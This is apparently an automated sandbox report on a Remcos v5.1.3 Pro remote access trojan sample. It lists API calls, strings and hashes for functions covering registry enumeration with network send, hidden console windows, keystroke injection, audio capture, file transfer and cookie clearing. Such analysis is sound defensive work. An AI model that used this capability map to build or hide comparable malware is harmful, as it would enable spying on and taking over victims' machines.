                                                                                                                                                                                          • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                                                                                                                                          • Opcode Fuzzy Hash: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                                                                                                                          • _free.LIBCMT ref: 00445515
                                                                                                                                                                                          • _free.LIBCMT ref: 0044552E
                                                                                                                                                                                          • _free.LIBCMT ref: 00445560
                                                                                                                                                                                          • _free.LIBCMT ref: 00445569
                                                                                                                                                                                          • _free.LIBCMT ref: 00445575
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                          • String ID: C
                                                                                                                                                                                          • API String ID: 1679612858-1037565863
                                                                                                                                                                                          • Opcode ID: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                                                                                                                                                          • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                                                                                                                                                          • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: tcp$udp
                                                                                                                                                                                          • API String ID: 0-3725065008
                                                                                                                                                                                          • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                                                                                          • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                                                                                                                          • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                                                                                          • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                                                                                                          • ExitThread.KERNEL32 ref: 004018F6
                                                                                                                                                                                          • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                                                                                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                                                                          • String ID: PkG$XMG$NG$NG
                                                                                                                                                                                          • API String ID: 1649129571-3151166067
                                                                                                                                                                                          • Opcode ID: 4b7364bfcc1bd630ab7c11aef8ce64a9f1d5b929ce3f61ecf823bc09278bf149
                                                                                                                                                                                          • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b7364bfcc1bd630ab7c11aef8ce64a9f1d5b929ce3f61ecf823bc09278bf149
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                                                                                                                                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                                                                                                                            • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                                                                                                                                            • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                                                                          • String ID: .part
                                                                                                                                                                                          • API String ID: 1303771098-3499674018
                                                                                                                                                                                          • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                                                                                                                          • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                                                                                                                                          • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                                                                                                                                                          • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                                                                                                          • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Console$Window$AllocOutputShow
                                                                                                                                                                                          • String ID: Remcos v$5.1.3 Pro$CONOUT$
                                                                                                                                                                                          • API String ID: 4067487056-2212855755
                                                                                                                                                                                          • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                                                                                                                          • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                                                                                                                                                          • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                                                                                                                          • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                                                                                                                                          • __freea.LIBCMT ref: 0044AEB0
                                                                                                                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                                          • __freea.LIBCMT ref: 0044AEB9
                                                                                                                                                                                          • __freea.LIBCMT ref: 0044AEDE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3864826663-0
                                                                                                                                                                                          • Opcode ID: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                                                                                                                                          • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                                                                                                                                          • Opcode Fuzzy Hash: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendInput.USER32 ref: 00419A25
                                                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                                                                                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                                                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                                                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                                                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                                                                                                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                                                                                                                          • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                                                                                                                            • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InputSend$Virtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1167301434-0
                                                                                                                                                                                          • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                                                                                                          • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                                                                                                                                          • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16_free
                                                                                                                                                                                          • String ID: a/p$am/pm$h{D
                                                                                                                                                                                          • API String ID: 2936374016-2303565833
                                                                                                                                                                                          • Opcode ID: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                                                                                                                                          • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                                                                                                                                          • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                                          • _free.LIBCMT ref: 00444E87
                                                                                                                                                                                          • _free.LIBCMT ref: 00444E9E
                                                                                                                                                                                          • _free.LIBCMT ref: 00444EBD
                                                                                                                                                                                          • _free.LIBCMT ref: 00444ED8
                                                                                                                                                                                          • _free.LIBCMT ref: 00444EEF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$AllocateHeap
                                                                                                                                                                                          • String ID: KED
                                                                                                                                                                                          • API String ID: 3033488037-2133951994
                                                                                                                                                                                          • Opcode ID: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                                                                                                                                          • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                                                                                                                                          • Opcode Fuzzy Hash: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Enum$InfoQueryValue
                                                                                                                                                                                          • String ID: [regsplt]$xUG$TG
                                                                                                                                                                                          • API String ID: 3554306468-1165877943
                                                                                                                                                                                          • Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                                                                                                                                          • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                                                                                                                                          • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                                                                                                                                                                          • __fassign.LIBCMT ref: 0044B4F9
                                                                                                                                                                                          • __fassign.LIBCMT ref: 0044B514
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                                                                                                                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B559
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B592
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                                          • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                                                                                                          • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                                                                                                                                          • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                                                                                                                                                                            • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                                                                                                            • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                                                                                          • String ID: xUG$NG$NG$TG
                                                                                                                                                                                          • API String ID: 3114080316-2811732169
                                                                                                                                                                                          • Opcode ID: 98ed44dc4caea9a8c226c7cdff5212121b7baccb751d051fcbcdd94b1bfdfefb
                                                                                                                                                                                          • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                                                                                                                                                          • Opcode Fuzzy Hash: 98ed44dc4caea9a8c226c7cdff5212121b7baccb751d051fcbcdd94b1bfdfefb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                                                                                                                                                                            • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                                                                                                            • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                                                                                                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                                                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0041B7F4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                                                                          • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                                                                          • API String ID: 3286818993-122982132
                                                                                                                                                                                          • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                                                                                                          • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                                                                                                                          • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                                                                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                                                                                                                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                                                                                                                          • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                                                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                                                                                          • API String ID: 1133728706-4073444585
                                                                                                                                                                                          • Opcode ID: fca4e0d28d89a9fa445d0ae1acaca183aa99da9c1d1975f14c0158772a6bba34
                                                                                                                                                                                          • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                                                                                                                                                          • Opcode Fuzzy Hash: fca4e0d28d89a9fa445d0ae1acaca183aa99da9c1d1975f14c0158772a6bba34
                                                                                                                                                                                          • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
